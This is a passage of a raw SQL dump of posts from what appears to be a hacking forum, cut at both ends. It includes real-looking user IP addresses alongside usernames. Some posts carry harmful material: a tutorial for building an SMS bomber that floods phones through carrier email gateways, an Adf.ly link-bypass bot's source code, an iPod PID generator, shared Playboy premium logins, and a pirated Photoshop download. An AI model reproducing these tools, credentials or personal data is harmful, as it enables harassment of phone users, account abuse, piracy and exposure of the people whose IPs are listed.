'82', 'iTzIpod', '1345857526', 'EDIT: Nevermind it was a glitch or bug I think http://i.imgur.com/1zCch.png', '24.212.197.164', '416597412', '1', '0', '82', '1345857645', '1', '9d96d6dfec98d9f1e15252e53e5ba5db', '0', '1345857645'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('845', '211', '844', '3', 'RE: [Announcement] Marketplace Removed', '0', '1', 't3h jok3r', '1345857966', 'Actually no, it was not a bug or glitch. I added the groups tab, so had to delete Graphics and Marketplace to add \"Groups\" tab.', '41.174.16.66', '699273282', '1', '0', '1', '1345858301', '1', 'b44b7f2504403e42bc8d90ac881b03d1', '0', '1345858301'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('846', '208', '788', '7', 'RE: I m feeling happy ;)', '0', '55', 'Baws', '1345858066', 'I don\'t get why HF is censored, that\'s where I got here from.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'e969836f2da784fa1816966b4e26f463', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('847', '211', '844', '3', 'RE: [Announcement] Marketplace Removed', '0', '20', 'JakeUS', '1345858067', 'Not a glitch, it is gone. EDIT: They are both still here?', '24.59.243.229', '406582245', '1', '0', '20', '1345858133', '1', '839b3d096ea4397c841cf388faab7bdb', '0', '1345858133'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('848', '211', '847', '3', 'RE: [Announcement] Marketplace Removed', '0', '1', 't3h jok3r', '1345858239', '[quote=\'JakeUS\' pid=\'847\' dateline=\'1345858067\'] Not a glitch, it is gone. EDIT: They are both still here? [/quote] Check my previous post on this thread.', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', '01682e0ca13986563721b57cd92d61cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('849', '212', '0', '58', 'Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1345858254', 'All official groups would have their own Userbar, Forum and Usertitle. Each group will have a leader, there can be 3 maximum leaders per group. Only leaders are allowed to create recruitment threads for their [b]own[/b] groups. [size=large][b]How to create a group?[/b][/size] Fill in the application below and you must meet the requirements. [b]Requirements[/b] [list] [*] Must have 50+ Posts [*] Must have 2+ Positive Rep [*] You must be registered and active for over a week. [/list] [b]Application[/b] [code] [b]Name of group:[/b] [b]Group Description:[/b] [b]Group Userbar:[/b] [b]Forum Name:[/b] [b]Forum Icon(34x34):[/b] [b]Why LH should make this group official:[/b] [/code] [size=large][b]Things needed after becoming official[/b][/size] [list] [*] Userbar [*] Forum Icon [/list] [size=large][b]Current Offical Groups[/b][/size] [img]http://l33thacking.net/images/ub/Coders.png[/img] [img]http://l33thacking.net/images/ub/unique.gif[/img] [img]http://l33thacking.net/images/ub/gamer.png[/img] [img]http://l33thacking.net/images/ub/ddosers.gif[/img] [img]http://l33thacking.net/images/ub/marketers.gif[/img]', '41.174.16.66', '699273282', '1', '0', '1', '1351134010', '1', '75fdcc0f7d41d7ae5237f27b428d8533', '0', '1351134010'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('850', '213', '0', '58', 'What group(s) would you like to see?', '0', '20', 'JakeUS', '1345858295', 'This thread is open for discussion about what group(s) the members would like to see. Post away.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '005a2b52bfd48fad428307600a3110fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('851', '213', '850', '58', 'RE: What group(s) would you like to see?', '0', '1', 't3h jok3r', '1345858353', 'I thought I made an application for it. Anyway, doesn\'t matter.', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', '173a90ee3ec408d04ff72ddc4c969e0a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('852', '208', '846', '7', 'RE: I m feeling happy ;)', '0', '1', 't3h jok3r', '1345858539', '[quote=\'Baws\' pid=\'846\' dateline=\'1345858066\'] I don\'t get why HF is censored, that\'s where I got here from. [/quote] We censored HF because in future when we will be getting high traffic and people see links or discussions on HF then we would lose traffic as HF is a bigger site than us with more content.', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', 'ea3e5b4bfc3df781cbf9ac56a33a956a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('853', '206', '833', '7', 'RE: Apply for SWAG', '0', '1', 't3h jok3r', '1345858722', '[quote=\'iTzIpod\' pid=\'833\' dateline=\'1345853367\'] [quote=\'t3h jok3r\' pid=\'815\' dateline=\'1345848187\'] [quote=\'HoverCatz\' pid=\'812\' dateline=\'1345848103\'] [quote=\'t3h jok3r\' pid=\'805\' dateline=\'1345847642\'] Nice mask, you been granted the SWAG award. Enjoy. [/quote] Thanks bro :D [/quote] No problem. You deserved it after all. [/quote] You gotta post a picture of yourself on the forum looking all swag just to receive the award? [/quote] We have a Help Document for the [url=http://l33thacking.com/misc.php?action=help&hid=12]Awards Sytem[/url]. To get the swag award, you have be FLEE (In other words, cool or unique). You can get the swag award by showing us some expensive merchandise or a unique accessories/clothing/footwear product.', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', '882a636c66ecc6ac67300acb45422c07', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('854', '183', '620', '54', 'RE: 2x PlayBoy Premium', '0', '1', 't3h jok3r', '1345858851', 'Is it possible to get any girls cell number from that site? JK Thanks for the logins. [b]Edited[/b] How to login? :(', '41.174.16.66', '699273282', '1', '0', '1', '1345858902', '1', '785738ff8ed576236722e1bfa04062be', '0', '1345858902'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('855', '135', '345', '43', 'RE: Astro Pid [free4all] mediafire', '0', '1', 't3h jok3r', '1345859018', 'Mayne, how can someone not post on my fav. PID generator?', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', '8574779e5ce823c5c1b7fe0faf725d1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('856', '214', '0', '52', '[tut] Creating a IPod PID Generator', '0', '4', 'Triple H', '1345859244', '[code] Public Function GenIPod() Dim Letters As String Dim StrSplit() As String Dim temp As String Letters = \"A B C D E F G H I J K L M N O P Q R S T U V W X Y Z\" \'// Define letters StrSplit = Split(Letters, \" \") \'// Split letters by a space temp = Int(Rnd * 10) & StrSplit(Int(Rnd * UBound(StrSplit))) & StrSplit(Int(Rnd * UBound(StrSplit))) Msgbox \"CCQDL\" + temp + \"DCP7\" End Function [/code] Then on Form_Load you would put Randomize genIpod Credits: pastebin.com', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', 'aaf47b2226850c07dba8933506f10ad2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('857', '215', '0', '52', 'Adf.ly BOT source code', '0', '4', 'Triple H', '1345859357', '[code] Imports System.IO Imports System.Text.RegularExpressions Imports System.Net Imports System.Threading Public Class Form1 Private Sub FutureButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FutureButton1.Click Close() End Sub Private Sub FutureButton2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FutureButton2.Click Me.WindowState = FormWindowState.Minimized End Sub Private Sub LinkLabel1_LinkClicked(ByVal sender As System.Object, ByVal e As System.Windows.Forms.LinkLabelLinkClickedEventArgs) Handles LinkLabel1.LinkClicked System.Diagnostics.Process.Start(\"http://Gr3eNoX.blogspot.com\") End Sub Private Sub FutureButton3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FutureButton3.Click If TextBox1.Text.StartsWith(\"http://adf.ly/\") Or TextBox1.Text.StartsWith(\"http://www.adf.ly/\") Then ListBox1.Items.Add(TextBox1.Text) End If If TextBox1.Text.StartsWith(\"adf.ly/\") Or TextBox1.Text.StartsWith(\"www.adf.ly/\") Then ListBox1.Items.Add(\"http://\" & TextBox1.Text) End If End Sub Private Sub FutureButton4_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FutureButton4.Click OpenFileDialog1.ShowDialog() Try If OpenFileDialog1.FileName = \"Select A File\" Or OpenFileDialog1.FileName = \"\" Then Else Dim loader As New StreamReader(OpenFileDialog1.FileName) While (loader.Peek() > -1) Dim link As String = loader.ReadLine If link.StartsWith(\"http://adf.ly/\") Or link.StartsWith(\"http://www.adf.ly/\") Then ListBox1.Items.Add(link) ElseIf link.StartsWith(\"adf.ly/\") Or link.StartsWith(\"www.adf.ly/\") Then ListBox1.Items.Add(\"http://\" & link) End If End While loader.Close() ProgressBar1.Maximum = ListBox1.Items.Count End If Catch ex As Exception MessageBox.Show(ex.Message) End Try End Sub Private Sub FutureButton6_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FutureButton6.Click Dim thr As New Thread(AddressOf getlnk) thr.IsBackground = True thr.Start() End Sub Sub getlnk() For Each lnk In ListBox1.Items Dim req As HttpWebRequest = HttpWebRequest.Create(lnk) Dim res As HttpWebResponse = req.GetResponse Dim rdr As New StreamReader(res.GetResponseStream()) Dim src As String = rdr.ReadToEnd res.Close() Dim reg As New Regex(\"var url = \'.*\';\") Dim match As Match = reg.Match(src) Dim link1 As String = match.ToString Dim link2 As String = link1.Split(\"\'\").GetValue(1) Dim link3 As String = link2.Split(\"\'\").GetValue(0) ListBox2.Items.Add(link3) ProgressBar1.Value = ProgressBar1.Value + 1 If ProgressBar1.Value = ProgressBar1.Maximum Then ProgressBar1.Value = ProgressBar1.Minimum Next End Sub Private Sub Form1_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load Control.CheckForIllegalCrossThreadCalls = False End Sub Private Sub FutureButton7_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FutureButton7.Click Clipboard.SetText(ListBox2.SelectedItem.ToString()) End Sub Private Sub FutureButton5_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FutureButton5.Click SaveFileDialog1.ShowDialog() Try If SaveFileDialog1.FileName = \"\" Or SaveFileDialog1.FileName = \"Enter The File Name\" Then MessageBox.Show(\"Please enter the filename\", \"Error\", MessageBoxButtons.OK, MessageBoxIcon.Error) Else Dim riter As New StreamWriter(SaveFileDialog1.FileName) For Each xlink In ListBox2.Items riter.WriteLine(xlink) Next riter.Close() End If Catch ex As Exception MessageBox.Show(ex.Message, \"Error\", MessageBoxButtons.OK, MessageBoxIcon.Error) End Try End Sub End Class [/code] [color=#FFA500][b][align=center]All credits go to the coder, Gr3eNoX.[/align][/b][/color]', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', 'dd793e6c8118abc3a71355bd79c3d9ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('858', '216', '0', '52', 'Making a world wide SMS Bomber in VB.net - TUT', '0', '4', 'Triple H', '1345859626', 'So to start off open Visual Basic then go to New ProjectThen Click here [img]http://gyazo.com/3d4217be91f755d241c393acd7accfa7.png[/img] Then you need to add * 4 Text Boxes * 2 Buttons * 1 Rich Text Box * 1 Combo Box Like This [img]http://gyazo.com/60742092807dcc6facbcd5978cd7cc3a.png[/img] Then right click on the form and click view code add this [code] Imports System.Web Imports System.IO Imports System.Net.Mail [/code] Then, go back to your Design, and double click Button1, and add this, http://pastebin.com/dcfuH7nA Then, double click button2, and add this [code] End [/code] [img]http://gyazo.com/7b63f001bc84789a9dbbbaec3e5efeaf.png[/img] And Add This [code] Sprint PCS Verizon Boost U.S T-Mobile (Germany) 7-11 Speakout Airtel (Karnataka, India) Airtel Wireless (Montana, USA) Alaska Communications Systems Aql AT&T AT&T Enterprise Paging BigRedGiant Mobile Solutions Bell Mobility & Solo Mobile BPL Mobile Cellular One CingularCingular (Postpaid) Centennial Wireless Cingular (GoPhone prepaid) Claro (Brasil) Claro (Nicaragua) Comcel Cricket CTI Emtel Fido General Communications Inc. Globalstar (satellite) Helio Illinois Valley Cellular Iridium (satellite) Iusacell i wireless Koodo Mobile LMT Meteor Mero Mobile MetroPCS Movicom Mobitel Movistar MTN MTS Nextel (United States) Nextel (Argentina) Orange Polska Personal Plus GSM President’s Choice Qwest Rogers SL Interactive Sasktel Setar Mobile email (Aruba) Suncom T-Mobile (USA) T-Mobile (Austria) T-Mobile (UK) Telus Mobility Thumb Cellular Tigo (Formerly Ola) Tracfone (prepaid) Unicel Virgin Mobile (USA) Virgin Mobile (Canada) Vodacom (South Africa) Vodafone (Italy) YCC MobiPCS (Hawaii only) [/code] Then Click Ok Now you might have to re-arange the text boxes for your program Then Do this [img]http://gyazo.com/bec1d431421c9d2e222c733478ec9a8c.png[/img] And This http://gyazo.com/dc7fde5e5e25be62695be9220d314262.png Now go to where you save it and there you go your own SMS Bomber. Credits: Purp If you need any help add PURP on AIM: atvrider2381', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', '8d310b0bdb0488ca42c6fe9b91ce5801', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('859', '183', '854', '54', 'RE: 2x PlayBoy Premium', '0', '112', '??????Z', '1345860012', '[quote=\'t3h jok3r\' pid=\'854\' dateline=\'1345858851\'] Is it possible to get any girls cell number from that site? JK Thanks for the logins. [b]Edited[/b] How to login? :( [/quote] http://plus.playboy.com/auth/login wouldnt mind a few of there numbers :D ;)', '92.22.242.209', '1545007825', '0', '0', '0', '0', '1', 'ead1b0285050cad74ca6d932cec49fbc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('860', '216', '858', '52', 'RE: Making a world wide SMS Bomber in VB.net - TUT', '0', '1', 't3h jok3r', '1345860291', 'I can\'t code because I\'m too busy these days, but I really needed someone to make me this SMS Bomber.', '41.174.16.66', '699273282', '1', '0', '0', '0', '1', 'c9f84cf5a2d68f0e70fbbc0b982decd3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('861', '208', '852', '7', 'RE: I m feeling happy ;)', '0', '82', 'iTzIpod', '1345863452', '[quote=\'t3h jok3r\' pid=\'852\' dateline=\'1345858539\'] [quote=\'Baws\' pid=\'846\' dateline=\'1345858066\'] I don\'t get why HF is censored, that\'s where I got here from. [/quote] We censored HF because in future when we will be getting high traffic and people see links or discussions on HF then we would lose traffic as HF is a bigger site than us with more content. [/quote] If we try, we can become a bigger site than HF. But will take a while and [b]A LOT[/b] of advertising.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b4cedc5884fe0c3f642d8a4907684ad5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('862', '206', '853', '7', 'RE: Apply for SWAG', '0', '82', 'iTzIpod', '1345863721', '[quote=\'t3h jok3r\' pid=\'853\' dateline=\'1345858722\'] [quote=\'iTzIpod\' pid=\'833\' dateline=\'1345853367\'] [quote=\'t3h jok3r\' pid=\'815\' dateline=\'1345848187\'] [quote=\'HoverCatz\' pid=\'812\' dateline=\'1345848103\'] [quote=\'t3h jok3r\' pid=\'805\' dateline=\'1345847642\'] Nice mask, you been granted the SWAG award. Enjoy. [/quote] Thanks bro :D [/quote] No problem. You deserved it after all. [/quote] You gotta post a picture of yourself on the forum looking all swag just to receive the award? [/quote] We have a Help Document for the [url=http://l33thacking.com/misc.php?action=help&hid=12]Awards Sytem[/url]. To get the swag award, you have be FLEE (In other words, cool or unique). You can get the swag award by showing us some expensive merchandise or a unique accessories/clothing/footwear product. [/quote] Seems cool. Worth a shot! Might try it tomorrow.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e7192b50e7004835bb2390945abf315f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('863', '193', '677', '59', 'RE: 150+ Free Hacking eBooks Collection', '0', '101', 'KFallen', '1345863965', 'thanks for the stuff bro. lots of info....', '66.87.0.215', '1112998103', '0', '0', '0', '0', '1', '51b170cc56b75d6be9fbd430e1d23cda', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('864', '188', '641', '59', 'RE: MASSIVE ebook COLLECTION {Limited} (300 + ebooks :o)', '0', '101', 'KFallen', '1345864305', 'Thanks for all this valuable info.', '66.87.0.215', '1112998103', '0', '0', '0', '0', '1', 'ba8c058461d26e8cc3d5c20a776db21d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('865', '74', '633', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '101', 'KFallen', '1345864578', '[quote=\'duhuh\' pid=\'633\' dateline=\'1345671429\'] Can this be removed? will anyone here actually do a survey? Sorry but I really don\'t think you should post Survey links here, its just gay as fuck. [/quote] True that bro.', '66.87.0.215', '1112998103', '0', '0', '0', '0', '1', '845cf480aeebb0118e4d6b1ee44d31ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('866', '177', '587', '12', 'RE: [tut]How to get the FBI login screen', '0', '101', 'KFallen', '1345865037', 'Pretty neat looking. thnx.', '66.87.0.215', '1112998103', '0', '0', '0', '0', '1', 'df5d8579eb80a95bd7ea98a280b81ca5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('867', '216', '858', '52', 'RE: Making a world wide SMS Bomber in VB.net - TUT', '0', '2', 'Apathy', '1345865097', 'Cool nice share thanks.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'fe73c0b838099e8a3e3b191496f18269', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('868', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '2', 'Apathy', '1345865210', 'Yea dog I will make a group called sexy mofos an only you and me in it :3', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '05003afc492c6b1ac286bfef22341c1c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('869', '207', '776', '3', 'RE: Suggest awards and apply for awads.', '0', '2', 'Apathy', '1345865316', 'Rep whore and post whore sound alright as well as the others but those two are more probable. The first one is not bad either.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '12ea7c3ef9767a994383651311cf3506', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('870', '176', '586', '12', 'RE: [Tut]How trace an email', '0', '101', 'KFallen', '1345865946', 'beast tut bro. pretty cool.', '66.87.0.215', '1112998103', '0', '0', '0', '0', '1', 'da9e7db3ed01d000e9beeb7adb14d58e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('871', '200', '814', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '82', 'iTzIpod', '1345867049', '[quote=\'t3h jok3r\' pid=\'814\' dateline=\'1345848129\'] [quote=\'iTzIpod\' pid=\'753\' dateline=\'1345818053\'] [quote=\'t3h jok3r\' pid=\'746\' dateline=\'1345817347\'] http://dl.dropbox.com/u/26951938/Photoshop.rar It\'s CS5 though, also It\'s clean. I checked the virus total scan before downloading and the sandbox control panel seems to be OK. ENJOY! [/quote] Is it Portable? :3 Or just the regular Adobe Photoshop CS5? Or Extended? Etc. [/quote] It\'s :opps: Ummm :thinking: Portable I guess cause it\'s basically a zip with a lot of files and the main PS program is in the zip. All you have to do is extract the content and open up PS to start using it. [/quote] It\'s the normal Adobe Photoshop CS6 :p Portable takes up less space. That\'s why I want to get portable.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '403d821d96b85a8162badbd33788b51b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('872', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '54', 'Sin Cara', '1345867133', '[b]Name of group:[/b] Forum Pro [b]Group Description:[/b] A group about forum discussion like MyBB, Vb, Ipb , Phpbb etc. [b]Group Userbar:[/b] [img]http://www.auplod.com/u/aodulp16a31.png[/img] [b]Forum Name:[/b] Official Group for forum makers [b]Forum Icon(34x34):[/b] [img]http://www.auplod.com/u/aupold16a32.png[/img] [b]Why LH should make this group official:[/b] Because its a unique and many members will love to join this ;)', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', 'a1f7e236d70a0a27d80322f8449e74a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('873', '193', '720', '59', 'RE: 150+ Free Hacking eBooks Collection', '0', '82', 'iTzIpod', '1345867189', '[quote=\'GRONgamer61\' pid=\'720\' dateline=\'1345774110\'] the Network Security download is locked with a password... --...-- [/quote] Oh? I\'ll see if I can crack it. Or ask for the password :p [hr] [quote=\'KFallen\' pid=\'863\' dateline=\'1345863965\'] thanks for the stuff bro. lots of info.... [/quote] You are welcome. =]', '24.212.197.164', '416597412', '1', '0', '82', '1345867748', '1', 'c01cc45928b62d6065ee6e27bc2750fd', '0', '1345867748'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('874', '176', '586', '12', 'RE: [Tut]How trace an email', '0', '82', 'iTzIpod', '1345867236', 'Will try this and post results.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'efde34d6a81e1c9b61335d3fe7661010', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('875', '24', '69', '12', 'RE: 240 Monetizing and hacking ebooks.', '0', '101', 'KFallen', '1345867324', 'Thanks for sharing. That image scared the shit out of me....', '66.87.0.215', '1112998103', '0', '0', '0', '0', '1', 'd00fc6265f03b5e283ef5febd19c0afd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('876', '207', '869', '3', 'RE: Suggest awards and apply for awads.', '0', '82', 'iTzIpod', '1345867358', '[quote=\'Apathy\' pid=\'869\' dateline=\'1345865316\'] Rep whore and post whore sound alright as well as the others but those two are more probable. The first one is not bad either. [/quote] Just saying you wrote awads in the title instead of awards*.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd4e0f672de2d6de34caf4321c8087807', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('877', '210', '835', '3', 'RE: Moved Successfully!!!', '0', '54', 'Sin Cara', '1345867378', 'Best of luck for the the future of this wonderful community ;)', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', '7e3ddbf50a5d400083e5935d6ea83378', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('878', '213', '850', '58', 'RE: What group(s) would you like to see?', '0', '82', 'iTzIpod', '1345867692', 'I would like to see a comic/troll group. I will be filling out the application tomorrow and post it on the other thread. =] Will be looking for a co - leader too.', '24.212.197.164', '416597412', '1', '0', '82', '1345867716', '1', '3aaaf281e13f96663306b43914efa926', '0', '1345867716'); INSERT 